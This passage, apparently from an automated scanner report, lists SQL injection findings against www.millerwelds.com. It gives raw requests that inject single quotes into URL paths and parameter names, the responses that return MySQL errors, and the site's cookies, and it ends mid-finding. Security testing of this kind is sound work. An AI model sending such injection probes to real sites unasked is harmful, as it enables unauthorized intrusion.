User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:50 GMT
Connection: Keep-Alive
Content-Length: 27982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.114. http://www.millerwelds.com/products/accessories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /products/accessories/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:10 GMT
Connection: Keep-Alive
Content-Length: 17965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=ut
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /products/accessories/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:11 GMT
Connection: Keep-Alive
Content-Length: 19672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=ut
...[SNIP]...

1.115. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products'/accessories/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:56 GMT
Connection: Keep-Alive
Content-Length: 27718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.116. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories'/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:59 GMT
Connection: Keep-Alive
Content-Length: 27996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.117. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories/international'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:01 GMT
Connection: Keep-Alive
Content-Length: 27996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.118. http://www.millerwelds.com/products/accessories/international/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /products/accessories/international/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:18 GMT
Connection: Keep-Alive
Content-Length: 19560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=is
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /products/accessories/international/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:19 GMT
Connection: Keep-Alive
Content-Length: 21253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=is
...[SNIP]...

1.119. http://www.millerwelds.com/resources/ [REST URL parameter 1]

Summary

Severity: